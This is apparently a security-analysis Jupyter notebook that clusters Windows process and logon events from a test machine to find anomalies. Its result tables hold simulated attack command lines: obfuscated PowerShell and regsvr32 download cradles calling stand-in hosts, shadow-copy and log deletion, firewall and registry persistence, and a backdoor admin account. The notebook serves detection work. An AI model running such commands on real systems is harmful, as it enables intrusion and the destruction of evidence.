{ "cells": [ { "cell_type": "markdown", "metadata": { "toc": true }, "source": [ "
\n", " | TimeGenerated | \n", "LastEventTime | \n", "NewProcessName | \n", "CommandLine | \n", "ClusterSize | \n", "commandlineTokensFull | \n", "pathScore | \n", "isSystemSession | \n", "
---|---|---|---|---|---|---|---|---|
46 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "1 | \n", "16 | \n", "2951 | \n", "False | \n", "
356 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe... | \n", "1 | \n", "27 | \n", "9108 | \n", "True | \n", "
301 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "\"cmd\" | \n", "1 | \n", "2 | \n", "2570 | \n", "True | \n", "
256 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-01-14_202614\\CollectGuestLogs.exe | \n", "\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\WindowsAzure\\CollectGuestLogsTemp\\710dc858-9c96-4df... | \n", "1 | \n", "18 | \n", "6421 | \n", "True | \n", "
219 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\wermgr.exe | \n", "C:\\Windows\\system32\\wermgr.exe -upload | \n", "1 | \n", "7 | \n", "2922 | \n", "True | \n", "
198 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c echo \" SYSTEMINFO && SYSTEMINFO && DEL \" | \n", "1 | \n", "17 | \n", "2941 | \n", "False | \n", "
195 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web S... | \n", "1 | \n", "39 | \n", "2941 | \n", "False | \n", "
176 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\wuauclt.exe | \n", ".\\wuauclt.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "1 | \n", "14 | \n", "3406 | \n", "False | \n", "
171 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "c:\\Windows\\System32\\svchost.exe -k malicious | \n", "1 | \n", "9 | \n", "3040 | \n", "False | \n", "
163 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\users\\Bob\\appdata\\Ro... | \n", "1 | \n", "18 | \n", "3179 | \n", "False | \n", "
162 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e... | \n", "1 | \n", "56 | \n", "2941 | \n", "False | \n", "
139 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command \"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | \n", "1 | \n", "36 | \n", "3726 | \n", "False | \n", "
134 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding | \n", "1 | \n", "8 | \n", "3546 | \n", "True | \n", "
133 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\sppsvc.exe | \n", "C:\\Windows\\system32\\sppsvc.exe | \n", "1 | \n", "5 | \n", "2933 | \n", "True | \n", "
130 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "1 | \n", "25 | \n", "3726 | \n", "False | \n", "
110 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "1 | \n", "46 | \n", "2941 | \n", "False | \n", "
292 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\taskhostw.exe | \n", "taskhostw.exe SYSTEM | \n", "1 | \n", "2 | \n", "3262 | \n", "True | \n", "
106 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell.exe -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"... | \n", "1 | \n", "68 | \n", "3726 | \n", "False | \n", "
57 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\tsetup.1.exe | \n", "c:\\Diagnostics\\UserTmp\\tsetup.1.exe C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetu... | \n", "1 | \n", "40 | \n", "3405 | \n", "False | \n", "
59 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh.exe \"in (*.exe) do start # artificial commandline solely for purposes of triggering test\" | \n", "1 | \n", "22 | \n", "3179 | \n", "False | \n", "
61 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | \n", "1 | \n", "28 | \n", "2941 | \n", "False | \n", "
64 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web... | \n", "1 | \n", "41 | \n", "2941 | \n", "False | \n", "
65 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&del C:\\inetpub\\logs\\logFiles\\W3SVC1\\*.log /q&echo [S]&cd&e... | \n", "1 | \n", "32 | \n", "2941 | \n", "False | \n", "
74 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\dllhost.exe | \n", "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | \n", "1 | \n", "12 | \n", "3024 | \n", "True | \n", "
62 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | \n", "1 | \n", "31 | \n", "2941 | \n", "False | \n", "
78 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | \n", "1 | \n", "21 | \n", "2570 | \n", "False | \n", "
82 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 share TestShare=c:\\testshare /Grant:Users,Read | \n", "1 | \n", "13 | \n", "2638 | \n", "False | \n", "
83 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\Dism.exe | \n", "dism /online /enable-feature /featurename:File-Services /NoRestart | \n", "1 | \n", "11 | \n", "2659 | \n", "True | \n", "
86 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\Temp\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\DismHost.exe | \n", "C:\\Windows\\TEMP\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | \n", "1 | \n", "15 | \n", "4900 | \n", "True | \n", "
87 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "1 | \n", "5 | \n", "4175 | \n", "True | \n", "
94 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\regsvr32.exe | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "1 | \n", "20 | \n", "3399 | \n", "False | \n", "
75 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd.exe /c c:\\Diagnostics\\WindowsSimulateDetections.bat c:\\Diagnostics\\UserTmp | \n", "1 | \n", "12 | \n", "2570 | \n", "True | \n", "
108 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\"{2}{0}{1}\"-f ':/','/past... | \n", "1 | \n", "53 | \n", "3726 | \n", "False | \n", "
63 | \n", "2019-01-15 05:15:16.850 | \n", "2019-01-15 05:15:17.580 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\ProgramData\"© \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents\\\"Password Chan... | \n", "2 | \n", "29 | \n", "2941 | \n", "False | \n", "
211 | \n", "2019-01-15 05:15:19.223 | \n", "2019-01-15 05:15:19.337 | \n", "C:\\Diagnostics\\UserTmp\\hd.exe | \n", "hd.exe -pslist | \n", "2 | \n", "4 | \n", "2837 | \n", "False | \n", "
190 | \n", "2019-01-15 05:15:18.287 | \n", "2019-01-15 05:15:18.967 | \n", "C:\\Diagnostics\\UserTmp\\lsass.exe | \n", ".\\lsass.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "2 | \n", "14 | \n", "3183 | \n", "False | \n", "
149 | \n", "2019-01-15 05:15:15.520 | \n", "2019-01-15 05:15:15.923 | \n", "C:\\Windows\\System32\\net.exe | \n", "net group \"Domain Admins\" /domain | \n", "2 | \n", "8 | \n", "2589 | \n", "False | \n", "
104 | \n", "2019-01-15 05:15:12.977 | \n", "2019-01-15 05:15:19.583 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "2 | \n", "24 | \n", "3726 | \n", "False | \n", "
95 | \n", "2019-01-15 05:15:10.817 | \n", "2019-01-15 05:15:14.453 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "C:\\Windows\\system32\\svchost.exe -k wsappx | \n", "2 | \n", "8 | \n", "3040 | \n", "True | \n", "
77 | \n", "2019-01-15 05:15:03.247 | \n", "2019-01-15 05:15:11.260 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo Any questions about the commands executed here then please contact one of | \n", "2 | \n", "16 | \n", "2570 | \n", "False | \n", "
270 | \n", "2019-01-15 04:28:01.517 | \n", "2019-01-15 04:28:33.090 | \n", "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe | \n", "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /ua /installsource scheduler | \n", "2 | \n", "17 | \n", "4895 | \n", "True | \n", "
254 | \n", "2019-01-15 04:42:25.437 | \n", "2019-01-15 05:12:25.403 | \n", "C:\\Windows\\System32\\MusNotification.exe | \n", "C:\\Windows\\system32\\MusNotification.exe Display | \n", "2 | \n", "6 | \n", "3826 | \n", "True | \n", "
60 | \n", "2019-01-15 05:15:15.827 | \n", "2019-01-15 05:15:16.720 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | \n", "3 | \n", "25 | \n", "2941 | \n", "False | \n", "
142 | \n", "2019-01-15 05:15:14.770 | \n", "2019-01-15 05:15:15.283 | \n", "C:\\Windows\\System32\\whoami.exe | \n", "whoami | \n", "3 | \n", "0 | \n", "2907 | \n", "False | \n", "
125 | \n", "2019-01-15 05:15:12.123 | \n", "2019-01-15 05:15:17.650 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "3 | \n", "21 | \n", "2941 | \n", "False | \n", "
56 | \n", "2019-01-15 05:15:16.117 | \n", "2019-01-15 05:15:18.403 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "3 | \n", "15 | \n", "2951 | \n", "False | \n", "
85 | \n", "2019-01-15 05:15:03.830 | \n", "2019-01-15 05:15:19.447 | \n", "C:\\Windows\\System32\\net.exe | \n", "net use q: \\\\MSTICAlertsWin1\\TestShare Bob_testing /User:adm1nistrator | \n", "3 | \n", "12 | \n", "2589 | \n", "False | \n", "
49 | \n", "2019-01-15 05:15:16.353 | \n", "2019-01-15 05:15:16.520 | \n", "C:\\Diagnostics\\UserTmp\\42424.exe | \n", "42424.exe | \n", "3 | \n", "1 | \n", "2889 | \n", "False | \n", "
69 | \n", "2019-01-15 05:15:03.390 | \n", "2019-01-15 05:15:17.137 | \n", "C:\\Windows\\System32\\vssadmin.exe | \n", "vssadmin delete shadows /all /quiet | \n", "4 | \n", "7 | \n", "3131 | \n", "False | \n", "
193 | \n", "2019-01-15 05:02:28.260 | \n", "2019-01-15 05:15:19.537 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"powershell wscript.shell used to download a .gif\" | \n", "5 | \n", "14 | \n", "2941 | \n", "False | \n", "
169 | \n", "2019-01-15 05:15:14.493 | \n", "2019-01-15 05:15:19.060 | \n", "C:\\Diagnostics\\UserTmp\\svchost.exe | \n", "c:\\Diagnostics\\UserTmp\\svchost.exe | \n", "6 | \n", "6 | \n", "3411 | \n", "False | \n", "
122 | \n", "2019-01-15 05:15:11.947 | \n", "2019-01-15 05:15:19.403 | \n", "C:\\Diagnostics\\UserTmp\\implant.exe | \n", "implant.exe k111 | \n", "7 | \n", "3 | \n", "3390 | \n", "False | \n", "
68 | \n", "2019-01-15 05:15:12.513 | \n", "2019-01-15 05:15:18.630 | \n", "C:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "7 | \n", "7 | \n", "4617 | \n", "False | \n", "
80 | \n", "2019-01-15 05:15:03.410 | \n", "2019-01-15 05:15:18.670 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 user adm1nistrator Bob_testing /add | \n", "7 | \n", "10 | \n", "2638 | \n", "False | \n", "
67 | \n", "2019-01-15 05:15:05.193 | \n", "2019-01-15 05:15:19.617 | \n", "C:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "9 | \n", "6 | \n", "5005 | \n", "False | \n", "
48 | \n", "2019-01-15 05:15:10.667 | \n", "2019-01-15 05:15:18.917 | \n", "C:\\Diagnostics\\UserTmp\\rundll32.exe | \n", ".\\rundll32 /C 42424.exe | \n", "15 | \n", "7 | \n", "3391 | \n", "False | \n", "
47 | \n", "2019-01-15 05:15:03.057 | \n", "2019-01-15 05:15:18.820 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"systeminfo && systeminfo\" | \n", "23 | \n", "10 | \n", "2941 | \n", "False | \n", "
96 | \n", "2019-01-15 05:15:11.190 | \n", "2019-01-15 05:15:18.867 | \n", "C:\\Windows\\System32\\win32calc.exe | \n", "\"C:\\Windows\\System32\\win32calc.exe\" | \n", "28 | \n", "8 | \n", "3100 | \n", "False | \n", "
0 | \n", "2019-01-15 04:16:24.007 | \n", "2019-01-15 05:24:24.010 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... | \n", "35 | \n", "52 | \n", "12225 | \n", "True | \n", "
2 | \n", "2019-01-15 04:16:25.550 | \n", "2019-01-15 05:24:25.807 | \n", "C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding | \n", "38 | \n", "10 | \n", "3478 | \n", "True | \n", "
1 | \n", "2019-01-15 04:16:24.027 | \n", "2019-01-15 05:24:24.023 | \n", "C:\\Windows\\System32\\conhost.exe | \n", "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 | \n", "39 | \n", "10 | \n", "3028 | \n", "True | \n", "
3 | \n", "2019-01-15 04:15:26.000 | \n", "2019-01-15 05:24:26.010 | \n", "C:\\Windows\\System32\\cscript.exe | \n", "\"C:\\Windows\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\" | \n", "71 | \n", "13 | \n", "3022 | \n", "True | \n", "
\n", " | ClusterSize | \n", "processName | \n", "CommandLine | \n", "ClusterId | \n", "
---|---|---|---|---|
46 | \n", "1 | \n", "reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "-1 | \n", "
56 | \n", "3 | \n", "reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "7 | \n", "
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | Unnamed: 0 | \n", "TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "AccountNum | \n", "LogonHour | \n", "Clustered | \n", "ClusterId | \n", "ClusterSize | \n", "FirstEventTime | \n", "LastEventTime | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | \n", "1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "NT AUTHORITY\\SYSTEM | \n", "4624 | \n", "2019-01-15 01:42:28.340 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "SYSTEM | \n", "NT AUTHORITY | \n", "S-1-5-18 | \n", "0x3e7 | \n", "Advapi | \n", "5 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "- | \n", "1484 | \n", "5 | \n", "True | \n", "1 | \n", "11 | \n", "2019-01-15 01:42:28.340 | \n", "2019-01-15 05:15:14.453 | \n", "
0 | \n", "0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\MSTICAdmin | \n", "4624 | \n", "2019-01-15 04:28:33.090 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "MSTICAdmin | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-500 | \n", "0xfaac27 | \n", "Advapi | \n", "4 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "MSTICAlertsWin1 | \n", "2319 | \n", "5 | \n", "True | \n", "0 | \n", "2 | \n", "2019-01-15 04:28:33.090 | \n", "2019-01-15 05:15:02.980 | \n", "
2 | \n", "2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\adm1nistrator | \n", "4624 | \n", "2019-01-15 05:15:06.363 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "- | \n", "- | \n", "S-1-0-0 | \n", "adm1nistrator | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-1066 | \n", "0xfb5ee6 | \n", "NtLmSsp | \n", "3 | \n", "NTLM | \n", "NaN | \n", "fe80::38dc:e4a9:61bd:b458 | \n", "MSTICAlertsWin1 | \n", "2799 | \n", "5 | \n", "False | \n", "-1 | \n", "1 | \n", "2019-01-15 05:15:06.363 | \n", "2019-01-15 05:15:06.363 | \n", "
Account: adm1nistrator Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 05:15:06.363000 Logon type: 3(Network) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-1066 SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account Subject (source) account: -/- Logon process: NtLmSsp Authentication: NTLM Source IpAddress: fe80::38dc:e4a9:61bd:b458 Source Host: MSTICAlertsWin1 Logon status: nan |
Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 04:28:33.090000 Logon type: 4(Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: nan |
Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-01-15 01:42:28.340000 Logon type: 5(Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: nan |
\n", " | Unnamed: 0 | \n", "TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "AccountNum | \n", "LogonHour | \n", "Clustered | \n", "ClusterId | \n", "ClusterSize | \n", "FirstEventTime | \n", "LastEventTime | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | \n", "2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\adm1nistrator | \n", "4624 | \n", "2019-01-15 05:15:06.363 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "- | \n", "- | \n", "S-1-0-0 | \n", "adm1nistrator | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-1066 | \n", "0xfb5ee6 | \n", "NtLmSsp | \n", "3 | \n", "NTLM | \n", "NaN | \n", "fe80::38dc:e4a9:61bd:b458 | \n", "MSTICAlertsWin1 | \n", "2799 | \n", "5 | \n", "False | \n", "-1 | \n", "1 | \n", "2019-01-15 05:15:06.363 | \n", "2019-01-15 05:15:06.363 | \n", "
0 | \n", "0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\MSTICAdmin | \n", "4624 | \n", "2019-01-15 04:28:33.090 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "MSTICAdmin | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-500 | \n", "0xfaac27 | \n", "Advapi | \n", "4 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "MSTICAlertsWin1 | \n", "2319 | \n", "5 | \n", "True | \n", "0 | \n", "2 | \n", "2019-01-15 04:28:33.090 | \n", "2019-01-15 05:15:02.980 | \n", "
1 | \n", "1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "NT AUTHORITY\\SYSTEM | \n", "4624 | \n", "2019-01-15 01:42:28.340 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "SYSTEM | \n", "NT AUTHORITY | \n", "S-1-5-18 | \n", "0x3e7 | \n", "Advapi | \n", "5 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "- | \n", "1484 | \n", "5 | \n", "True | \n", "1 | \n", "11 | \n", "2019-01-15 01:42:28.340 | \n", "2019-01-15 05:15:14.453 | \n", "
\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"BokehJS does not appear to have successfully loaded. If loading BokehJS from CDN, this \\n\"+\n \"may be due to a slow or bad network connection. Possible fixes:\\n\"+\n \"
\\n\"+\n \"\\n\"+\n \"from bokeh.resources import INLINE\\n\"+\n \"output_notebook(resources=INLINE)\\n\"+\n \"
\\n\"+\n \"\n", " | \n", " | TimeGenerated | \n", "
---|---|---|
Account | \n", "LogonType | \n", "\n", " |
MSTICAlertsWin1\\MSTICAdmin | \n", "4 | \n", "2 | \n", "
MSTICAlertsWin1\\adm1nistrator | \n", "3 | \n", "1 | \n", "
NT AUTHORITY\\SYSTEM | \n", "5 | \n", "11 | \n", "